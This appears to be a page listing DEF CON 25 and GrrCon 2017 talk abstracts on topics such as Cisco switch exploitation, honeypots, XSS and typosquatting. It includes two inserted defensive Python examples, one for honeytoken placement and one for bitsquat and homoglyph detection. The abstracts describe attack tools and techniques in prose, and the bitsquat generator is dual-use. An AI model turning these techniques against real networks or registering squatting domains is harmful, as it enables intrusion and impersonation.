On March 17th, Cisco Systems Inc. made a public announcement that over 300 of the switches it manufactures are prone to a critical vulnerability that allows a potential attacker to take full control of the network equipment. This damaging public announcement was preceded by Wikileaks' publication of documents codenamed "Vault 7", which contained information on vulnerabilities and descriptions of tools needed to access phones, network equipment and even IoT devices. Cisco Systems Inc. had a huge task in front of them - patching this vast number of different switch models is not an easy task. The remediation for this vulnerability was available with the initial advisory, and patched versions of IOS software were announced on May 8th 2017. We have all heard about modern exploit mitigation techniques such as Data Execution Prevention and Layout Randomization. But just how hardened is the network equipment? And how hard is it to find critical vulnerabilities? To answer that question I decided to reproduce the steps necessary to create a fully working tool to get remote code execution on the Cisco switches mentioned in the public announcement. This presentation is a detailed write-up of the exploit development process for the vulnerability in the Cisco Cluster Management Protocol that allows a full takeover of the device. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Vivek Ramachandran,Thomas d’Otreppe – Make a 802.11AC Monitor

802.11ac networks present a significant challenge for scalable packet sniffing and analysis. With projected speeds in the Gigabit range, USB Wi-Fi card based solutions are now obsolete! In this workshop, we will look at how to build a custom monitoring solution for 802.11ac using off-the-shelf access points and open source software. Our "Hacker Gadget" will address 802.11ac monitoring challenges such as channel bonding, DFS channels, spatial streams and high throughput data rates. We will also look at different techniques to do live streaming analysis of 802.11 packets and derive security insights from it! For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Tom Sela – Fooling the Hound: Deceiving Domain Admin Hunters

The conflict between cyber attackers and defenders is too often in favor of attackers. Recent results of graph theory research incorporated into red-team tools such as BloodHound shift the balance even more dramatically towards attackers. Any regular domain user can map an entire network and extract the precise path of lateral movements needed to obtain domain admin credentials or a foothold at any other high-value asset. In this talk, we present a new practical defensive approach: deceive the attackers. Since the time of Sun Tzu, deceptions have been used on the battlefield to win wars. In recent years, the ancient military tactic of deception has been adopted by the cyber-security community in the form of HoneyTokens. Cyber deceptions, such as fictitious high-privilege credentials, are used as bait to lure the attackers into a trap where they can be detected. To shift the odds back in favor of the defenders, the same BloodHound graphs that are generated by attackers should be used by defenders to determine where and how to place bait with maximum effectiveness. In this way, we ensure that any shortest path to a high-value asset will include at least one deceptive node or edge. For More Information Please Visit:- https://defcon.org/
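One way to choose bait locations from such a graph, as an added Python example that is not the speaker's tool and uses a constructed toy graph rather than real BloodHound output: collect every shortest path from regular-user nodes to the high-value asset, then greedily pick the fewest intermediate hosts that together appear on all of them. Planting a fictitious high-privilege session or credential on those hosts means any attacker walking a shortest path touches a decoy. Paths that jump straight from a user to the target cannot be intercepted by a node-level bait and are reported separately, since they need an edge-level deception or a real permission fix. The node names and the single collapsed "can reach" relation are assumptions for illustration.

```python
# Added example (not Tom Sela's tooling): pick hosts for honeytokens so every
# shortest attack path to a high-value asset crosses a baited node.
from collections import defaultdict, deque

# Hypothetical BloodHound-style graph: an edge u -> v means that controlling u
# lets an attacker reach v (AdminTo, HasSession, MemberOf collapsed into one
# relation for brevity). Names are constructed.
GRAPH = {
    "alice": ["ws1"],
    "bob": ["ws2"],
    "ws1": ["srv1"],
    "ws2": ["srv1", "srv2"],
    "srv1": ["DomainAdmins"],
    "srv2": ["DomainAdmins"],
    "DomainAdmins": [],
}


def all_shortest_paths(graph, src, dst):
    """BFS that records every predecessor at the shortest distance, then
    unwinds them into the full list of shortest src -> dst paths."""
    dist = {src: 0}
    preds = defaultdict(list)
    queue = deque([src])
    while queue:
        u = queue.popleft()
        for v in graph.get(u, []):
            if v not in dist:
                dist[v] = dist[u] + 1
                preds[v].append(u)
                queue.append(v)
            elif dist[v] == dist[u] + 1:
                preds[v].append(u)
    if dst not in dist:
        return []
    paths = []

    def unwind(node, suffix):
        if node == src:
            paths.append([src] + suffix)
            return
        for p in preds[node]:
            unwind(p, [node] + suffix)

    unwind(dst, [])
    return paths


def bait_placement(graph, starts, target):
    """Greedy hitting set over the intermediate nodes of every shortest path.

    Returns (bait_nodes, paths, direct): bait_nodes are the hosts on which to
    plant a honeytoken, paths are all shortest paths considered, and direct
    lists paths that go straight from a start to the target, which no
    node-level bait can intercept.
    """
    paths = [p for s in starts for p in all_shortest_paths(graph, s, target)]
    direct = [p for p in paths if len(p) == 2]
    uncovered = [set(p[1:-1]) for p in paths if len(p) > 2]
    bait = []
    while uncovered:
        counts = defaultdict(int)
        for nodes in uncovered:
            for n in nodes:
                counts[n] += 1
        # cover the most remaining paths first; name breaks ties for stability
        best = min(counts, key=lambda n: (-counts[n], n))
        bait.append(best)
        uncovered = [nodes for nodes in uncovered if best not in nodes]
    return bait, paths, direct


def covers_all(paths, bait):
    """True when every multi-hop shortest path passes through a baited node."""
    return all(set(p[1:-1]) & set(bait) for p in paths if len(p) > 2)


if __name__ == "__main__":
    bait, paths, direct = bait_placement(GRAPH, ["alice", "bob"], "DomainAdmins")
    for p in paths:
        print(" -> ".join(p))
    print("plant honeytokens on:", bait, "covered:", covers_all(paths, bait))
    print("paths needing an edge-level decoy:", direct)
```

Greedy hitting set is not guaranteed minimal, but it is cheap to recompute whenever the graph is re-collected, and the resulting bait set is small enough for a SOC to monitor each decoy's use as a high-confidence alert.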

DEF CON 25 Packet Hacking Village – Tan Kean Siong – Stories from a 15 days SMB Honeypot Mum

WannaCry, EternalBlue and SambaCry have been popular topics recently. During the outbreak in May 2017, we designed a 'real' Windows 7 / Samba server with the open source Dionaea honeypot and exposed the favourable SMB port to the world. Tons of the expected WannaCry attacks hit the pot, and interestingly there is a juicier collection than that! In this session, we would like to present the stories from a 15-day SMB honeypot. As honeypot hobbyists, we deployed an emulated Windows 7 machine implanted with the DoublePulsar backdoor. Yes, a Windows system infected with DoublePulsar! Also, our honeypot is up for the CVE-2017-7494 SambaCry vulnerability. We observed tons of scanning which looks for targets to spread the expected WannaCry ransomware. Surprisingly, there is a juicier collection in the pot, e.g. EternalRocks, reverse shells, RATs, DDoSers, coin miners, trojans, etc. (you name it, you have it!). We would love to share various interesting data from the 15-day observation by a single home-based sensor across the entire IP space. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Ron Taylor – Demystifying The OPM breach, WTF Really Happened

In September 2016 the House Committee on Oversight finally released their report. Four years after the original breach, we are still asking how the f*#! did this happen. This talk will go over the key findings of the report and the impact on those who were affected. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Brute Logic – XSS For the win

Cross-site Scripting (XSS) is the most widespread plague of the web but is usually restricted to a simple popup window with the infamous vector. In this short talk we will see what can be done with XSS as an attacker or pentester and its impact on an application, its users and even the underlying system. Many sorts of black JavaScript magic will be seen, ranging from simple virtual defacement to create panic with a joke to straightforward and deadly RCE (Remote Command Execution) attacks on at least 25% of the web! For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Sam Erb – You’re Going to Connect to the Wrong Domain Name

Can you tell the difference between gооgle.com and google.com? How about xn--ggle-55da.com and google.com? Both domain names are valid and show up in the Certificate Transparency log. This talk will be a fun and frustrating look at typosquatting, bitsquatting and IDN homoglyphs. This talk will cover the basics, show real-world examples and show how to use Certificate Transparency to track down particularly malicious impersonating domain names which have valid X.509 certificates. For More Information Please Visit:- https://defcon.org/
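The three impersonation classes named above can be enumerated and checked mechanically. The Python example below is added here and is not the speaker's code: it generates the single-bit-flip (bitsquat) variants of a domain that remain valid LDH labels, decodes xn-- (Punycode) labels with the standard library's idna codec, and folds a small constructed table of Cyrillic and Greek confusables to a Latin "skeleton" so that a look-alike such as google.com spelled with Cyrillic o is flagged. The confusable table is a subset for illustration, not the full Unicode confusables data, and the domains used are constructed; the same is_lookalike check, run over names harvested from Certificate Transparency logs, is how one would track down the certificate-bearing impersonators the talk refers to.

```python
# Added example (not Sam Erb's tooling): bitsquat candidates and IDN
# homoglyph detection for a target domain.
import unicodedata

# Constructed subset of confusables: Cyrillic/Greek letters that render like
# Latin ones in most fonts. Not the full Unicode confusables table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",
    "\u03bf": "o", "\u03b1": "a", "\u03c1": "p",
}
LDH = set("abcdefghijklmnopqrstuvwxyz0123456789-")


def to_unicode(domain):
    """Decode any xn-- (Punycode/ACE) label with the stdlib idna codec."""
    labels = []
    for label in domain.split("."):
        if label.lower().startswith("xn--"):
            label = label.encode("ascii").decode("idna")
        labels.append(label)
    return ".".join(labels)


def skeleton(domain):
    """What a user sees: decode ACE, normalize, lowercase, then fold
    confusables to their Latin look-alike. Equal skeletons are
    visually indistinguishable."""
    text = unicodedata.normalize("NFKC", to_unicode(domain)).lower()
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def is_lookalike(candidate, target):
    """True when candidate renders like target but is a different name."""
    return skeleton(candidate) == skeleton(target) and candidate.lower() != target.lower()


def _valid_name(name):
    """Every label non-empty, LDH only, no leading or trailing hyphen."""
    return all(lbl and lbl[0] != "-" and lbl[-1] != "-" and set(lbl) <= LDH
               for lbl in name.split("."))


def bitsquats(domain):
    """Single-bit flips of each character (left of the TLD) that still form a
    valid LDH name: the names a memory error could send a client to."""
    name, _, tld = domain.lower().rpartition(".")
    out = set()
    for i, ch in enumerate(name):
        for bit in range(8):
            flipped = chr(ord(ch) ^ (1 << bit)).lower()
            # a case flip is the same DNS name; a flip to '.' would add a label
            if flipped == ch or flipped == ".":
                continue
            candidate = name[:i] + flipped + name[i + 1:]
            if _valid_name(candidate):
                out.add(candidate + "." + tld)
    return sorted(out)


if __name__ == "__main__":
    target = "google.com"
    print(len(bitsquats(target)), "bitsquat candidates, e.g.", bitsquats(target)[:5])
    # constructed look-alike: both o's replaced by Cyrillic U+043E
    fake = "g\u043e\u043egle.com"
    ace = fake.encode("idna").decode("ascii")
    print(ace, "->", to_unicode(ace), "lookalike:", is_lookalike(ace, target))
```

The stdlib idna codec implements the older IDNA2003 rules and performs no mixed-script check, which is exactly why such names can be registered; the skeleton comparison above is what catches them after the fact.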

DEF CON 25 Packet Hacking Village – Peter Ewane – Cloudy With A Chance of Persistence

The use of Amazon Cloud as a base of operations for businesses is increasing at a rapid rate. Everyone from 2 person start-ups to major companies have been migrating to the cloud. Because of this migration, cloud vendors have become the focus of potential exploitation and various role abuse in order to achieve persistence. This presentation will cover several different methods of post-infection and account persistence along with a discussion on best practices that can be used to protect from such techniques. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Mike Raggo, Chet Hosmer – Covert TCP with a Twist

Taking a modern-day look on the 20 year anniversary of Craig Rowland's article on Covert TCP, we explore current-day methods of covert communications and demonstrate that we are not much better off at stopping these exploits than we were 20 years ago. With the explosion of networked devices using a plethora of new wired and wireless protocols, the covert communication exploit surface is paving new paths for covert data exfiltration and secret communications. In this session, we will explore uPnP, Zigbee, WiFi, P25, Streaming Audio Services, IoT, and much more. Through real-world examples, sample code, and demos, we bring to light this hidden world of concealed communications. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Michael Gianarakis ,Keith Lee – Portia

Portia is a new tool we have written at SpiderLabs to aid in internal penetration testing engagements. The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources, as well as IP ranges, subnets or a list of IP addresses. The tool finds its way around the network and attempts to gain access to the hosts, finds and dumps the passwords/hashes, and reuses them to compromise other hosts in the network. In short, the tool helps with lateral movement in the network and automating privilege escalation, as well as finding sensitive data residing on the hosts. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Megan Roddie – Strengthen Secops By Leveraging Neurodiversity

High productivity, extreme attention to detail, logical/calculated, passionate, and hyper-focused. These are all characteristics considered valuable in the information security industry. However, a certain group of people who exceed expectations in these skill sets are constantly overlooked for job positions. That group of people is the High Functioning Autistic (HFA) community. Individuals in the high functioning autistic community are often overlooked for job positions due to their social disabilities which makes them perform poorly in an interview and in their interactions with other people. However, if you look past their awkward behavior and social struggles, you will find these individuals are perfectly suited for roles in the information security industry. This talk aims to show the listeners that, as many tech companies have found, the HFA community is ripe with individuals who could be the best of the best in the security industry if given the chance. The audience will realize that a small investment in time, understanding, and acceptance can result in the addition of an invaluable member to a Security Operations team. For More Information Please Visit:- https://defcon.org/

DEF CON 25 Packet Hacking Village – Marek Majkowski – IP Spoofing

At Cloudflare we deal with DDoS attacks every day. Over the years, we've gained a lot of experience in defending from all different kinds of threats. We have found that the largest attacks that cause the internet infrastructure to burn are only possible due to IP spoofing. In this talk we'll discuss what we learned about L3 (OSI layer 3) IP spoofing. We'll explain why L3 attacks are even possible in today's internet and what direct and reflected L3 attacks look like. We'll describe our attempts to trace the IP spoofing and why attack attribution is so hard. Our architecture allows us to perform most attack mitigations in software. We'll explain a couple of effective L3 mitigation techniques we've developed to stop our servers burning. While L3 attacks are a real danger to the internet, they don't need to be. With a bit of cooperation and a couple of technical tricks maybe we can fix the IP spoofing problem for all. For More Information Please Visit:- https://defcon.org/

The Tool Box | SessionGopher

Today's episode of The Tool Box features SessionGopher. We break down everything you need to know, including what it does, who developed it, and the best ways to use it. Check out SessionGopher here: GitHub - https://github.com/fireeye/SessionGopher

GrrCon 2017 – Dissecting Destructive Malware and Recovering from Catastrophe

An in depth look into the NotPetya malware outbreak from a boots-on-ground incident responder with first-hand experience assisting organizations through response, recovery and investigation. This talk will cover how NotPetya operates, the geopolitical significance of this attack, ramifications of fake news during NotPetya response efforts, methods to recover certain files encrypted by Salsa20, and what you can do to prepare for similar destructive malware attacks in the future. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – How do you POC? Are you really testing a product

We have all read the reports from the successful breaches, from Target to Equifax. Have you ever questioned why the security products in place did not prevent the breach or alert earlier to it? Trend Micro's presentation will focus on the Proof-of-Concept phase of testing a solution from start to finish. Learn the key steps of a POC, how companies run product tests, what is effective and where the errors are. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Tales From The Trenches: Practical Information Security Lessons

In this talk, Michael Belton discusses his past experiences delivering penetration testing services. The format for this talk is conversational and audience participation is encouraged. Michael will provide background on the situation, discuss the actual techniques and attacks used in the hack and use that to identify defense-in-depth measures that could have mitigated risk. This talk is intended to learn from the mistakes of the past. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Building a Usable Mobile Data Protection Strategy

Mobile smart devices, from the consumer perspective, are easy to activate for an enriched user experience. Once smart devices are enabled in the enterprise, after the basics, the user experience users know drops, while users and InfoSec demand more with competing agendas. This presentation will provide you with a blueprint of the various mobile data protection technologies. We will review what is provided natively, as well as third-party options, to help you decide what will fit best in your environment and corporate culture. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Software Defined Segmentation

Acquisitions, partnerships, BYOD, IoT are just some business demands that increase security headaches for businesses and place demand on IT. Come explore segmentation as a mechanism to combat compromises of one system to another. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – The Shuttle Columbia Disaster: Lessons That Were Not Learned

When the shuttle Challenger was destroyed in 1986, poor NASA culture was significant in the events that led to the disaster. NASA made serious changes to their space program to ensure human life was at the least risk possible. But in 2003, the shuttle Columbia suffered a disaster and all hands were lost upon re-entry. The ensuing investigation specified that "NASA organizational culture had as much to do with this accident as the foam." This talk will look at how culture affects risk in organizations, using both Challenger and Columbia as examples, talk about the difficulties of risk management, and give guidance on how to deal with and overcome difficult risk decisions, such as the final decision by NASA not to inform the astronauts they were doomed. Takeaways will be how to understand how culture impacts risk, what you can do about it, and how to make better risk decisions. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Infrastructure Based Security

As the enterprise continues to be bombarded with advanced and increasingly more sophisticated attacks, the CISO must shift to accomplish three critical objectives: gain superior visibility and control over their environment; automate tasks that enhance security posture; and utilize integrated systems that identify breaches and facilitate rapid remediation. This can only be done by partnering with vendors that have strong threat research, broad capabilities, powerful tools and integrations with existing tools. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist